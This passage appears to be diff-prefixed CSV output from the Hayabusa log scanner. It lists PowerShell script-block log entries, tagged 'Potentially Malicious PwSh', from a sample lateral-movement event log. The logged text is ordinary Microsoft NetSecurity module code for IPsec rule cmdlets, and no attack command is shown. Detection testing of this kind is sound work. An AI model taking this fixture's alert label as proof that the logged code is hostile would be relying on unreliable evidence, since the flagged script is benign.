${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 